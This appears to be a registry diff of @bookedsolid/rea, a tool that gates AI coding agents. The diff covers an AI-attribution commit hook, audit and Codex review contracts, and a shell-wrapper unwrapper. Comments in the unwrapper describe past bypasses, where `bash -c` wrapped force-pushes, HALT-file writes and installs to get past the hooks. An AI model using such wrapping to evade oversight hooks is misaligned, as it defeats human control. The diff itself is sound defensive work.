@bookedsolid/rea 0.16.4 → 0.18.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/.husky/commit-msg CHANGED
@@ -78,9 +78,17 @@ BLOCKED=0
78
78
  MATCHES=""
79
79
 
80
80
  # Pattern 1: Co-Authored-By with noreply@ email
81
- if grep -qiE 'Co-Authored-By:.*noreply@' "$COMMIT_MSG_FILE" 2>/dev/null; then
81
+ # 0.18.0 helix-020 / discord-ops Round 10 #3 fix (G4.B):
82
+ # the pre-fix pattern `Co-Authored-By:.*noreply@` matched both AI-tool
83
+ # noreply addresses AND legitimate `<user>@users.noreply.github.com`
84
+ # collaborator credits — blocking honest co-author footers from human
85
+ # contributors. Refined to enumerate AI-tool noreply domains explicitly;
86
+ # Pattern 2 below catches Co-Authored-By with named tools regardless of
87
+ # email, so dropping users.noreply.github.com from this branch only
88
+ # relaxes the check for human collaborators — never for AI.
89
+ if grep -qiE 'Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github-copilot|github\.com|claude\.ai|chatgpt\.com|googlemail\.com|google\.com|cursor\.com|codeium\.com|tabnine\.com|amazon\.com|amazonaws\.com|amazon-q\.amazonaws\.com|cody\.dev|sourcegraph\.com)' "$COMMIT_MSG_FILE" 2>/dev/null; then
82
90
  BLOCKED=1
83
- MATCHES="${MATCHES}$(grep -niE 'Co-Authored-By:.*noreply@' "$COMMIT_MSG_FILE" 2>/dev/null)
91
+ MATCHES="${MATCHES}$(grep -niE 'Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github-copilot|github\.com|claude\.ai|chatgpt\.com|googlemail\.com|google\.com|cursor\.com|codeium\.com|tabnine\.com|amazon\.com|amazonaws\.com|amazon-q\.amazonaws\.com|cody\.dev|sourcegraph\.com)' "$COMMIT_MSG_FILE" 2>/dev/null)
84
92
  "
85
93
  fi
86
94
 
@@ -32,13 +32,18 @@ You may read additional files in the repo if needed for context, but do so read-
32
32
  1. **Check HALT and policy** — read `.rea/policy.yaml`, check `.rea/HALT`. If frozen, stop immediately.
33
33
  2. **Validate Codex availability** — if `/codex` is not installed, report and stop. Do not silently fall back to another reviewer.
34
34
  3. **Prepare the Codex invocation** — construct the adversarial-review prompt with the diff, commit log, and any relevant context files.
35
- 4. **Invoke `/codex:adversarial-review`** — this call flows through the REA middleware chain (audit → kill-switch → tier → policy → redact → injection → execute → result-size-cap).
35
+ 4. **Invoke `/codex:adversarial-review --model gpt-5.4`** — pass the `--model` flag explicitly to pin the iron-gate model regardless of plugin defaults or `~/.codex/config.toml` resolution. The codex-companion script accepts `--model` (see `codex-companion.mjs:684`). This call flows through the REA middleware chain (audit → kill-switch → tier → policy → redact → injection → execute → result-size-cap).
36
36
 
37
37
  **Model pinning (0.16.1+):** when the codex plugin's adversarial-review supports model overrides, request `gpt-5.4` with `model_reasoning_effort: high` to match the push-gate's iron-gate defaults. Pre-0.16.1, in-session adversarial reviews ran on whatever the plugin defaulted to (likely `codex-auto-review` at medium reasoning) — meaningfully WEAKER than the push-gate's `gpt-5.4` + `high`. This caused a "in-session review passes, push-gate review fails" pattern reported by helix across 014 / 015 / 016. If the plugin call accepts model parameters, pass them. If it does not, fall back to invoking `codex exec review --base <ref> --json --ephemeral -c model="gpt-5.4" -c model_reasoning_effort="high"` directly via `Bash` — same shape the push-gate uses (see `src/hooks/push-gate/codex-runner.ts::runCodexReview`). The cost of the stronger model is small relative to the cost of shipping a release with a P1 bypass that gets caught at consumer push time.
38
38
  5. **Parse the Codex output** — extract structured findings.
39
39
  6. **Classify findings** by category: security, correctness, edge cases, test gaps, API design, performance.
40
40
  7. **Assign verdict**: `pass` (no material findings), `concerns` (findings worth addressing but not blocking), `blocking` (findings that must be fixed before merge).
41
- 8. **Emit an audit entry — REQUIRED** for every `/codex-review` invocation. The pre-push gate does not consult audit records to decide pass/fail (post-0.11.0 the gate is stateless), but the `/codex-review` slash command's Step 3 verifies an audit entry was appended for this run and surfaces "review never happened" to the user when one is missing. The two specs are a contract pair — audit emission is what tells the operator their interactive review actually completed. Append via the public `@bookedsolid/rea/audit` helper:
41
+ 8. **Emit an audit entry — REQUIRED** for every `/codex-review` invocation. This is one of three identical contract checkpoints:
42
+ - The runtime always emits (`src/hooks/push-gate/index.ts` calls `appendAuditRecord` via `safeAppend` on every completed review — see `EVT_REVIEWED`).
43
+ - This agent always emits (this step).
44
+ - The `/codex-review` slash command's Step 3 verifies the entry exists and surfaces "review never happened" as a failure if it does not.
45
+
46
+ The pre-push gate does not consult audit records to decide pass/fail (post-0.11.0 the gate is stateless), but the audit record is still the operator's only forensic trail for an interactive review. Without it, "did this review actually happen" becomes unanswerable. Reconciled in 0.18.0 (helixir Finding #6 across cycles 1–7) so the three documents — `commands/codex-review.md`, `agents/codex-adversarial.md`, `src/hooks/push-gate/index.ts` — describe the same contract in identical wording. Append via the public `@bookedsolid/rea/audit` helper:
42
47
 
43
48
  ```ts
44
49
  import { appendAuditRecord, CODEX_REVIEW_TOOL_NAME, CODEX_REVIEW_SERVER_NAME, Tier, InvocationStatus } from '@bookedsolid/rea/audit';
@@ -55,17 +55,21 @@ Invoke the `codex-adversarial` agent with:
55
55
 
56
56
  The agent wraps `/codex:adversarial-review` and returns structured findings.
57
57
 
58
- ## Step 3 — (Optional) verify audit entry
58
+ ## Step 3 — Verify audit entry — REQUIRED
59
59
 
60
- Audit emission is **optional** in 0.11.0+. The pre-push gate is stateless and does not consult audit records to decide pass/fail; the agent's structured findings ARE the review. The agent will append an audit entry when it helps forensic traceability (intermittent verdicts, review-history audits) but its absence is not a failure.
60
+ The `codex-adversarial` agent **MUST** emit an audit entry for every invocation. This is the same contract documented in `agents/codex-adversarial.md` Step 4 and matches the runtime behavior of `rea hook push-gate` (which always calls `appendAuditRecord` on a completed review see `src/hooks/push-gate/index.ts`'s `EVT_REVIEWED` path).
61
61
 
62
- If you want to confirm an entry was written for this run:
62
+ Verify the entry was written:
63
63
 
64
64
  ```bash
65
65
  tail -n 1 .rea/audit.jsonl
66
66
  ```
67
67
 
68
- A `codex-adversarial-review` entry with `head_sha`, `target`, `finding_count`, and `verdict` fields is informative but DO NOT treat its absence as a failure. The review happened if the agent returned text. (Pre-0.15.0 this step was a hard verification gate that contradicted the agent's "audit optional" contract — see Helix Finding 3, 2026-05-03.)
68
+ The expected entry has `tool_name: "codex.review"`, `server_name: "codex"`, and `metadata` containing `head_sha`, `target`, `finding_count`, and `verdict`. If the entry is missing, the review **did not complete its contract** surface that to the user as a failure.
69
+
70
+ **Why audit emission is required even though the pre-push gate is stateless:** the 0.11.0 push-gate decides pass/fail on Codex's live verdict, not on a receipt in the audit log — but the audit record is still the operator's only forensic trail for an interactive `/codex-review` run. Without it, "did this review actually happen" becomes unanswerable, which is exactly the failure mode helixir flagged across rounds 65/66/73 in the 0.13–0.17 cycle. Runtime always emits; the agent always emits; the slash command verifies. Three checkpoints, one contract.
71
+
72
+ (Earlier docs in 0.15+ said this step was "optional"; that wording contradicted both the agent's Step 4 and the runtime behavior of `safeAppend` in `src/hooks/push-gate/index.ts`. Reconciled in 0.18.0 — helixir Finding #6 across cycles 1–7.)
69
73
 
70
74
  ## Step 4 — Report
71
75
 
package/dist/cli/init.js CHANGED
@@ -233,10 +233,28 @@ async function printCodexInstallAssist() {
233
233
  console.log(' Install via the Claude Code Codex plugin helper: `/codex:setup`,');
234
234
  console.log(' or set `review.codex_required: false` in .rea/policy.yaml to opt out.');
235
235
  }
236
+ function readExistingInstalledAt(policyPath) {
237
+ try {
238
+ if (!fs.existsSync(policyPath))
239
+ return undefined;
240
+ const raw = fs.readFileSync(policyPath, 'utf8');
241
+ const m = raw.match(/^installed_at:\s*"([^"]+)"\s*$/m);
242
+ return m ? m[1] : undefined;
243
+ }
244
+ catch {
245
+ return undefined;
246
+ }
247
+ }
236
248
  function writePolicyYaml(targetDir, config, layered) {
237
249
  const policyPath = path.join(targetDir, REA_DIR, POLICY_FILE);
238
250
  const installedBy = process.env.USER ?? os.userInfo().username ?? 'unknown';
239
- const installedAt = new Date().toISOString();
251
+ // 0.17.0 idempotency: preserve the original `installed_at` if a policy
252
+ // already exists. Without this, every `rea init` re-stamps the field
253
+ // and produces a non-idempotent diff. The first install date is the
254
+ // semantically correct value — re-runs reflect refreshes, not new
255
+ // installs. Falls back to `new Date()` only when the file is absent
256
+ // or unparseable.
257
+ const installedAt = readExistingInstalledAt(policyPath) ?? new Date().toISOString();
240
258
  const lines = [];
241
259
  lines.push(`# .rea/policy.yaml — managed by rea v${getPkgVersion()}`);
242
260
  lines.push(`# Edit carefully: tightening takes effect on next load; loosening requires human approval.`);
@@ -349,14 +367,36 @@ async function writeInstallManifest(targetDir, profile, fragmentInput) {
349
367
  sha256: sha256OfBuffer(buildFragment(fragmentInput)),
350
368
  source: 'claude-md',
351
369
  });
370
+ // 0.17.0 idempotency: preserve the original `installed_at` from a
371
+ // prior manifest if present. The first install date is the semantic
372
+ // truth — re-runs reflect refreshes, not new installs.
373
+ const manifestPath = path.join(targetDir, REA_DIR, 'install-manifest.json');
352
374
  const manifest = {
353
375
  version: getPkgVersion(),
354
376
  profile,
355
- installed_at: new Date().toISOString(),
377
+ installed_at: readExistingManifestInstalledAt(manifestPath) ?? new Date().toISOString(),
356
378
  files: entries,
357
379
  };
358
380
  return writeManifestAtomic(targetDir, manifest);
359
381
  }
382
+ function readExistingManifestInstalledAt(manifestPath) {
383
+ try {
384
+ if (!fs.existsSync(manifestPath))
385
+ return undefined;
386
+ const raw = fs.readFileSync(manifestPath, 'utf8');
387
+ const parsed = JSON.parse(raw);
388
+ if (typeof parsed === 'object' &&
389
+ parsed !== null &&
390
+ 'installed_at' in parsed &&
391
+ typeof parsed.installed_at === 'string') {
392
+ return parsed.installed_at;
393
+ }
394
+ }
395
+ catch {
396
+ // Fall through — caller stamps a fresh date.
397
+ }
398
+ return undefined;
399
+ }
360
400
  export async function runInit(options) {
361
401
  const targetDir = process.cwd();
362
402
  const reagentPolicyPath = detectReagentPolicy(targetDir);
@@ -635,7 +635,22 @@ export async function runUpgrade(options = {}) {
635
635
  }
636
636
  const now = new Date().toISOString();
637
637
  const installedAt = existingManifest?.installed_at ?? now;
638
- const profile = existingManifest?.profile ?? 'unknown';
638
+ // 0.18.0 helix-020 G6 fix: pre-fix the upgrade path read profile from
639
+ // the existing manifest only — and pre-0.2.0 manifests recorded
640
+ // `"unknown"` as a placeholder. Every subsequent `rea upgrade` then
641
+ // re-stamped `"unknown"` forever. Authoritative source for the
642
+ // profile is `.rea/policy.yaml`; the manifest is a derivative
643
+ // record. Read policy first; fall back to existing manifest only
644
+ // when policy load fails (covers the bootstrap case where the
645
+ // manifest exists but policy is malformed).
646
+ let profile;
647
+ try {
648
+ const livePolicy = loadPolicy(resolvedRoot);
649
+ profile = livePolicy.profile;
650
+ }
651
+ catch {
652
+ profile = existingManifest?.profile ?? 'unknown';
653
+ }
639
654
  const freshManifest = {
640
655
  version: getPkgVersion(),
641
656
  profile,
@@ -136,18 +136,29 @@ function escapeTomlString(value) {
136
136
  */
137
137
  export async function runCodexReview(options) {
138
138
  const spawner = options.spawnImpl ?? spawn;
139
+ // 0.18.0 iron-gate runtime default: ALWAYS pass model + reasoning
140
+ // effort to codex. Pre-fix, undefined options fell back to codex's
141
+ // own default (`codex-auto-review` at medium reasoning), which
142
+ // bypassed the iron-gate intent and let weaker reviews ship. Now
143
+ // the runtime hardcodes `gpt-5.4` + `high` as the floor; policy
144
+ // can OVERRIDE to a different model/effort but cannot opt out into
145
+ // codex's defaults (config.toml or otherwise). The user's directive
146
+ // — "we want codex to be using its BEST. EVERY TIME" — is enforced
147
+ // here, not at the policy layer.
148
+ //
139
149
  // Model + reasoning overrides go BEFORE the `exec` subcommand because
140
150
  // `-c key=value` is a top-level codex CLI flag, not an `exec` flag.
141
151
  // Codex's TOML parser interprets the value, so we wrap strings in TOML
142
152
  // quotes — `-c model="gpt-5.4"` not `-c model=gpt-5.4` — to ensure the
143
153
  // value lands as a string regardless of upstream parsing changes.
144
- const overrideArgs = [];
145
- if (options.model !== undefined && options.model.length > 0) {
146
- overrideArgs.push('-c', `model="${escapeTomlString(options.model)}"`);
147
- }
148
- if (options.reasoningEffort !== undefined) {
149
- overrideArgs.push('-c', `model_reasoning_effort="${escapeTomlString(options.reasoningEffort)}"`);
150
- }
154
+ const effectiveModel = options.model !== undefined && options.model.length > 0 ? options.model : 'gpt-5.4';
155
+ const effectiveReasoning = options.reasoningEffort ?? 'high';
156
+ const overrideArgs = [
157
+ '-c',
158
+ `model="${escapeTomlString(effectiveModel)}"`,
159
+ '-c',
160
+ `model_reasoning_effort="${escapeTomlString(effectiveReasoning)}"`,
161
+ ];
151
162
  const baseArgs = [
152
163
  ...overrideArgs,
153
164
  'exec',
@@ -11,6 +11,7 @@ declare const PolicySchema: z.ZodObject<{
11
11
  promotion_requires_human_approval: z.ZodBoolean;
12
12
  block_ai_attribution: z.ZodDefault<z.ZodBoolean>;
13
13
  blocked_paths: z.ZodArray<z.ZodString, "many">;
14
+ protected_writes: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
14
15
  protected_paths_relax: z.ZodDefault<z.ZodArray<z.ZodString, "many">>;
15
16
  notification_channel: z.ZodDefault<z.ZodString>;
16
17
  injection_detection: z.ZodOptional<z.ZodEnum<["block", "warn"]>>;
@@ -47,10 +48,14 @@ declare const PolicySchema: z.ZodObject<{
47
48
  */
48
49
  auto_narrow_threshold: z.ZodOptional<z.ZodNumber>;
49
50
  /**
50
- * Codex CLI model override (0.13.4+). Pinned via `-c model="<name>"` on
51
- * every `codex exec review` invocation. When unset, codex's own default
52
- * applies which today is the special-purpose `codex-auto-review`
53
- * model at `medium` reasoning, NOT the flagship.
51
+ * Codex CLI model override (0.13.4+; runtime-default since 0.18.0).
52
+ * Pinned via `-c model="<name>"` on every `codex exec review`
53
+ * invocation. **0.18.0 iron-gate runtime default**: when unset, the
54
+ * runtime hardcodes `gpt-5.4` codex's own default
55
+ * (`codex-auto-review` at medium) is no longer reachable through the
56
+ * rea push-gate. To select a different model, set this key
57
+ * explicitly. config.toml is consulted ONLY when the explicit value
58
+ * passed by rea is `undefined`, which the runtime never does.
54
59
  *
55
60
  * For serious adversarial review on consumer codebases (where verdict
56
61
  * stability matters) the recommended setting is `gpt-5.4` with
@@ -174,6 +179,7 @@ declare const PolicySchema: z.ZodObject<{
174
179
  blocked_paths: string[];
175
180
  protected_paths_relax: string[];
176
181
  notification_channel: string;
182
+ protected_writes?: string[] | undefined;
177
183
  injection_detection?: "block" | "warn" | undefined;
178
184
  injection?: {
179
185
  suspicious_blocks_writes?: boolean | undefined;
@@ -220,6 +226,7 @@ declare const PolicySchema: z.ZodObject<{
220
226
  promotion_requires_human_approval: boolean;
221
227
  blocked_paths: string[];
222
228
  block_ai_attribution?: boolean | undefined;
229
+ protected_writes?: string[] | undefined;
223
230
  protected_paths_relax?: string[] | undefined;
224
231
  notification_channel?: string | undefined;
225
232
  injection_detection?: "block" | "warn" | undefined;
@@ -39,10 +39,14 @@ const ReviewPolicySchema = z
39
39
  */
40
40
  auto_narrow_threshold: z.number().int().nonnegative().optional(),
41
41
  /**
42
- * Codex CLI model override (0.13.4+). Pinned via `-c model="<name>"` on
43
- * every `codex exec review` invocation. When unset, codex's own default
44
- * applies which today is the special-purpose `codex-auto-review`
45
- * model at `medium` reasoning, NOT the flagship.
42
+ * Codex CLI model override (0.13.4+; runtime-default since 0.18.0).
43
+ * Pinned via `-c model="<name>"` on every `codex exec review`
44
+ * invocation. **0.18.0 iron-gate runtime default**: when unset, the
45
+ * runtime hardcodes `gpt-5.4` codex's own default
46
+ * (`codex-auto-review` at medium) is no longer reachable through the
47
+ * rea push-gate. To select a different model, set this key
48
+ * explicitly. config.toml is consulted ONLY when the explicit value
49
+ * passed by rea is `undefined`, which the runtime never does.
46
50
  *
47
51
  * For serious adversarial review on consumer codebases (where verdict
48
52
  * stability matters) the recommended setting is `gpt-5.4` with
@@ -160,11 +164,19 @@ const PolicySchema = z
160
164
  promotion_requires_human_approval: z.boolean(),
161
165
  block_ai_attribution: z.boolean().default(false),
162
166
  blocked_paths: z.array(z.string()),
163
- // 0.16.3 F7: opt-in relax list. Consumers can list rea-managed
164
- // hard-protected patterns they want unblocked (e.g. `.husky/` to
165
- // author their own husky hooks). The kill-switch invariants
166
- // (`.rea/HALT`, `.rea/policy.yaml`, `.claude/settings.json`) are
167
- // ignored if listed see hooks/_lib/protected-paths.sh.
167
+ // 0.16.5 F9 (helix-018 Option A): full policy-driven definition of
168
+ // the rea-managed write-protection list. When set, fully owns the
169
+ // protected set (kill-switch invariants are always added). When
170
+ // unset, defaults to the 5 historical patterns. Consumers who want
171
+ // to ADD a path (e.g. `.github/workflows/`) or remove non-invariant
172
+ // entries (e.g. `.husky/`) declare the full list here.
173
+ protected_writes: z.array(z.string()).optional(),
174
+ // 0.16.3 F7: opt-in subtractor. Removes entries from whatever the
175
+ // effective protected set is (default OR `protected_writes`).
176
+ // Kill-switch invariants (`.rea/HALT`, `.rea/policy.yaml`,
177
+ // `.claude/settings.json`) are silently dropped from the relax
178
+ // list — see hooks/_lib/protected-paths.sh. Both keys can coexist;
179
+ // `protected_paths_relax` runs AFTER `protected_writes`.
168
180
  protected_paths_relax: z.array(z.string()).default([]),
169
181
  notification_channel: z.string().default(''),
170
182
  injection_detection: z.enum(['block', 'warn']).optional(),
@@ -26,6 +26,7 @@ export declare const ProfileSchema: z.ZodObject<{
26
26
  promotion_requires_human_approval: z.ZodOptional<z.ZodBoolean>;
27
27
  block_ai_attribution: z.ZodOptional<z.ZodBoolean>;
28
28
  blocked_paths: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
29
+ protected_writes: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
29
30
  protected_paths_relax: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
30
31
  notification_channel: z.ZodOptional<z.ZodString>;
31
32
  injection_detection: z.ZodOptional<z.ZodEnum<["block", "warn"]>>;
@@ -52,6 +53,7 @@ export declare const ProfileSchema: z.ZodObject<{
52
53
  promotion_requires_human_approval?: boolean | undefined;
53
54
  block_ai_attribution?: boolean | undefined;
54
55
  blocked_paths?: string[] | undefined;
56
+ protected_writes?: string[] | undefined;
55
57
  protected_paths_relax?: string[] | undefined;
56
58
  notification_channel?: string | undefined;
57
59
  injection_detection?: "block" | "warn" | undefined;
@@ -68,6 +70,7 @@ export declare const ProfileSchema: z.ZodObject<{
68
70
  promotion_requires_human_approval?: boolean | undefined;
69
71
  block_ai_attribution?: boolean | undefined;
70
72
  blocked_paths?: string[] | undefined;
73
+ protected_writes?: string[] | undefined;
71
74
  protected_paths_relax?: string[] | undefined;
72
75
  notification_channel?: string | undefined;
73
76
  injection_detection?: "block" | "warn" | undefined;
@@ -48,6 +48,7 @@ export const ProfileSchema = z
48
48
  promotion_requires_human_approval: z.boolean().optional(),
49
49
  block_ai_attribution: z.boolean().optional(),
50
50
  blocked_paths: z.array(z.string()).optional(),
51
+ protected_writes: z.array(z.string()).optional(),
51
52
  protected_paths_relax: z.array(z.string()).optional(),
52
53
  notification_channel: z.string().optional(),
53
54
  injection_detection: z.enum(['block', 'warn']).optional(),
@@ -268,6 +268,7 @@ export interface Policy {
268
268
  promotion_requires_human_approval: boolean;
269
269
  block_ai_attribution: boolean;
270
270
  blocked_paths: string[];
271
+ protected_writes?: string[];
271
272
  protected_paths_relax: string[];
272
273
  notification_channel: string;
273
274
  injection_detection?: 'block' | 'warn';
@@ -51,6 +51,214 @@
51
51
  # do NOT honor `\` escapes; double-quoted spans treat `\"` as a literal
52
52
  # `"` and skip past it.
53
53
 
54
+ # Unwrap nested shell wrappers — `bash -c 'PAYLOAD'`, `sh -lc "PAYLOAD"`,
55
+ # `zsh -ic 'PAYLOAD'`, etc. Emits the input string AS-IS plus each inner
56
+ # PAYLOAD as a separate line. Pre-0.17.0 the splitter never parsed
57
+ # inside wrapped quotes, so `bash -c 'git push --force'` produced a
58
+ # single segment whose first token was `bash` — defeating every check
59
+ # that uses `any_segment_starts_with`. This helper makes the inner
60
+ # payload visible as its own segment, so every existing detection rule
61
+ # fires uniformly on wrapped and unwrapped commands.
62
+ #
63
+ # Closes helix-017 #1, #2, #3 (0.16.2):
64
+ # - `bash -lc 'git push --force origin HEAD'` → payload now seen by H1
65
+ # - `bash -c 'printf x > .rea/HALT'` → payload now seen by bash-gate
66
+ # - `bash -lc 'npm install some-package'` → payload now seen by audit-gate
67
+ #
68
+ # Recognized wrapper shape (case-insensitive shell name):
69
+ # (bash|sh|zsh|dash|ksh) [optional -flags...] (-c|-lc|-lic|-ic|-cl|-cli) (QUOTED_ARG)
70
+ #
71
+ # QUOTED_ARG can be single- or double-quoted. Single-quote bodies have no
72
+ # escape semantics. Double-quote bodies treat \" and \\ as literal
73
+ # escapes (per POSIX). Multiple wrappers per command-line are handled
74
+ # (e.g. `foo; bash -c 'bar' && sh -c 'baz'` emits both `bar` and `baz`).
75
+ #
76
+ # 0.18.0 helix-020 G1.A fix: the unwrap pass scans a QUOTE-MASKED form
77
+ # of the input, not the raw input. Pre-fix, a quoted argument that
78
+ # MENTIONED a wrapper (e.g. `git commit -m "docs: mention bash -c 'npm
79
+ # install left-pad'"`) would emit a phantom inner-payload segment, and
80
+ # `dependency-audit-gate.sh` would block the innocent commit. The
81
+ # quote-mask layer (the same one `_rea_split_segments` uses) replaces
82
+ # all in-quote separators AND in-quote single/double quote characters
83
+ # with multi-byte sentinels — so the wrapper regex can no longer match
84
+ # inside an outer quoted span. The unwrapped payload itself is still
85
+ # emitted from the un-masked input by recomputing offsets back to the
86
+ # raw string, so escape semantics inside legitimate wrappers stay
87
+ # correct. We only need the mask to suppress matching; the captured
88
+ # payload is read off the original string.
89
+ #
90
+ # Limitation: ONE level of unwrapping. A wrapper inside a wrapper
91
+ # (`bash -c "bash -c 'innermost'"`) emits only the second-level payload
92
+ # (`bash -c 'innermost'`), not the third-level. This is enough for
93
+ # every consumer-reported bypass; deeper nesting can be added later
94
+ # without changing the contract.
95
+ _rea_unwrap_nested_shells() {
96
+ local cmd="$1"
97
+ printf '%s\n' "$cmd"
98
+ # Build a mask where in-quote `"` `'` `;` `&` `|` characters are
99
+ # replaced with multi-byte sentinels so the wrapper regex below
100
+ # cannot match wrapper syntax that lives inside outer quoted prose.
101
+ # We also mask the in-quote QUOTE characters themselves so the awk
102
+ # body's quote-state heuristic (which looks at the byte immediately
103
+ # after the matched wrapper-prefix region) cannot mistake an inner
104
+ # quote for a payload-opening quote. Sentinel bytes are aligned to
105
+ # be the same width as their original character (single-byte) so
106
+ # offsets into the raw string remain valid for payload extraction.
107
+ #
108
+ # Approach: rather than synthesize a per-byte sentinel of width 1,
109
+ # we run the awk wrapper-scan against a SEPARATE masked stream and
110
+ # then translate matched RSTART/RLENGTH offsets back to the original
111
+ # string. We do that by passing both strings into awk (raw via stdin,
112
+ # masked via -v MASKED) and tracking the same index across both —
113
+ # since the mask substitutes single bytes with single bytes only
114
+ # (placeholder bytes drawn from the C0 control-character range) the
115
+ # offsets line up.
116
+ #
117
+ # Placeholder bytes — chosen from the C0 control range so they
118
+ # cannot appear in real shell input under UTF-8 (NUL, BEL, VT, FF
119
+ # are reserved by some shells; we use SOH/STX/ETX/ENQ/ACK which are
120
+ # not assigned operational meaning by any shell we ship with).
121
+ # \x01 SOH — replaces in-quote `"`
122
+ # \x02 STX — replaces in-quote `'`
123
+ # \x03 ETX — replaces in-quote `;`
124
+ # \x05 ENQ — replaces in-quote `&`
125
+ # \x06 ACK — replaces in-quote `|`
126
+ local masked
127
+ masked=$(printf '%s' "$cmd" | awk '
128
+ {
129
+ line = $0
130
+ out = ""
131
+ i = 1
132
+ n = length(line)
133
+ mode = 0
134
+ while (i <= n) {
135
+ ch = substr(line, i, 1)
136
+ if (mode == 0) {
137
+ if (ch == "\"") { mode = 1; out = out ch; i++; continue }
138
+ if (ch == "'\''") { mode = 2; out = out ch; i++; continue }
139
+ out = out ch
140
+ i++
141
+ continue
142
+ }
143
+ if (mode == 2) {
144
+ if (ch == "'\''") { mode = 0; out = out "\002"; i++; continue }
145
+ if (ch == ";") { out = out "\003"; i++; continue }
146
+ if (ch == "&") { out = out "\005"; i++; continue }
147
+ if (ch == "|") { out = out "\006"; i++; continue }
148
+ if (ch == "\"") { out = out "\001"; i++; continue }
149
+ out = out ch
150
+ i++
151
+ continue
152
+ }
153
+ # mode == 1 (double-quoted)
154
+ if (ch == "\\" && i < n) {
155
+ # Preserve the escape pair literally — width preserved.
156
+ nxt = substr(line, i + 1, 1)
157
+ out = out ch nxt
158
+ i += 2
159
+ continue
160
+ }
161
+ if (ch == "\"") { mode = 0; out = out "\001"; i++; continue }
162
+ if (ch == ";") { out = out "\003"; i++; continue }
163
+ if (ch == "&") { out = out "\005"; i++; continue }
164
+ if (ch == "|") { out = out "\006"; i++; continue }
165
+ if (ch == "'\''") { out = out "\002"; i++; continue }
166
+ out = out ch
167
+ i++
168
+ }
169
+ printf "%s", out
170
+ }')
171
+ # Pass both raw and masked into awk. Wrapper-regex matches against the
172
+ # masked form; payload extraction reads the raw form using the same
173
+ # offsets. Because the mask is byte-for-byte width-preserving, the
174
+ # same RSTART/RLENGTH applies to both.
175
+ printf '' | awk -v raw="$cmd" -v masked="$masked" '
176
+ BEGIN {
177
+ # Wrapper-prefix regex: shell-name + optional flag tokens + -c-style flag.
178
+ # Each flag token is `-` followed by 1+ letters and trailing space.
179
+ # NOTE: matches only OUTSIDE outer quoted spans because in-quote
180
+ # `"`, `'\''`, `;`, `&`, `|` are masked out in `masked`. The leading
181
+ # alternation `(^|[[:space:]&|;])` therefore cannot anchor on a
182
+ # masked separator, and the shell-name token itself can no longer
183
+ # appear adjacent to a masked quote-introducer.
184
+ WRAP = "(^|[[:space:]&|;])(bash|sh|zsh|dash|ksh)([[:space:]]+-[a-zA-Z]+)*[[:space:]]+-(c|lc|lic|ic|cl|cli|li|il)[[:space:]]+"
185
+ # Track the cursor in BOTH raw and masked. Because the mask is
186
+ # byte-for-byte width-preserving, the same RSTART/RLENGTH applies
187
+ # to both — but each iteration of the loop must SLICE both strings
188
+ # by the same amount so subsequent matches see synchronized tails.
189
+ mrest = masked
190
+ rrest = raw
191
+ while (length(mrest) > 0) {
192
+ if (! match(mrest, WRAP)) break
193
+ # Tail begins immediately after the matched wrapper prefix in
194
+ # BOTH strings (offsets line up — mask is width-preserving).
195
+ mtail = substr(mrest, RSTART + RLENGTH)
196
+ rtail = substr(rrest, RSTART + RLENGTH)
197
+ # The wrapper-payload-introducing quote must be a REAL outer
198
+ # quote — i.e. not a masked in-quote sentinel. Probe the raw
199
+ # form for the introducer character, which the mask preserved
200
+ # verbatim only when it was an outer quote.
201
+ first = substr(rtail, 1, 1)
202
+ mfirst = substr(mtail, 1, 1)
203
+ if (first == "'\''" && mfirst == "'\''") {
204
+ # Single-quoted body: no escape semantics; runs to next `'\''`.
205
+ body = substr(rtail, 2)
206
+ mbody = substr(mtail, 2)
207
+ end = index(body, "'\''")
208
+ if (end == 0) {
209
+ mrest = substr(mtail, 2)
210
+ rrest = substr(rtail, 2)
211
+ continue
212
+ }
213
+ payload = substr(body, 1, end - 1)
214
+ print payload
215
+ mrest = substr(mbody, end + 1)
216
+ rrest = substr(body, end + 1)
217
+ continue
218
+ }
219
+ if (first == "\"" && mfirst == "\"") {
220
+ # Double-quoted body: \" and \\ are literal escapes.
221
+ body = substr(rtail, 2)
222
+ n = length(body)
223
+ j = 1
224
+ out = ""
225
+ closed = 0
226
+ while (j <= n) {
227
+ c = substr(body, j, 1)
228
+ if (c == "\\" && j < n) {
229
+ nxt = substr(body, j + 1, 1)
230
+ if (nxt == "\"" || nxt == "\\") { out = out nxt; j += 2; continue }
231
+ out = out c nxt
232
+ j += 2
233
+ continue
234
+ }
235
+ if (c == "\"") { closed = j; break }
236
+ out = out c
237
+ j++
238
+ }
239
+ if (closed == 0) {
240
+ mrest = substr(mtail, 2)
241
+ rrest = substr(rtail, 2)
242
+ continue
243
+ }
244
+ print out
245
+ # Skip past the opening `"` (1 byte) AND the closing `"` (1
246
+ # byte at body[closed], i.e. mtail[closed+1]). Cursor lands
247
+ # at mtail[closed+2].
248
+ mrest = substr(mtail, closed + 2)
249
+ rrest = substr(rtail, closed + 2)
250
+ continue
251
+ }
252
+ # Non-quoted argument — proceed past the matched prefix only.
253
+ mrest = mtail
254
+ rrest = rtail
255
+ }
256
+ }
257
+ # Empty action with no input rules — explicitly drive the loop from
258
+ # END so awk does not require any input records.
259
+ END {}'
260
+ }
261
+
54
262
  # Split $1 on shell command separators. Emits one segment per line on
55
263
  # stdout (empty segments preserved). Used by both higher-level helpers
56
264
  # below; not generally called by hooks directly.
@@ -103,7 +311,14 @@ _rea_split_segments() {
103
311
  # splitting so quoted prose no longer over-splits and anchors trigger
104
312
  # words at the head of phantom segments. See header comment for the
105
313
  # full rationale.
106
- printf '%s' "$cmd" \
314
+ #
315
+ # 0.17.0 helix-017 #1-#3 fix: unwrap `bash -c 'PAYLOAD'` style
316
+ # wrappers BEFORE the quote-mask + split passes. The unwrap step
317
+ # emits the original line plus each inner PAYLOAD as separate
318
+ # records; the existing pipeline then quote-masks and splits each
319
+ # record independently. Inner payload anchors trigger words for the
320
+ # `any_segment_*` checks downstream.
321
+ _rea_unwrap_nested_shells "$cmd" \
107
322
  | awk '
108
323
  BEGIN {
109
324
  SC = "__REA_SEP_SC_a8f2c1__"
@@ -53,20 +53,80 @@ policy_bool_true() {
53
53
  [[ "$value" == "true" ]]
54
54
  }
55
55
 
56
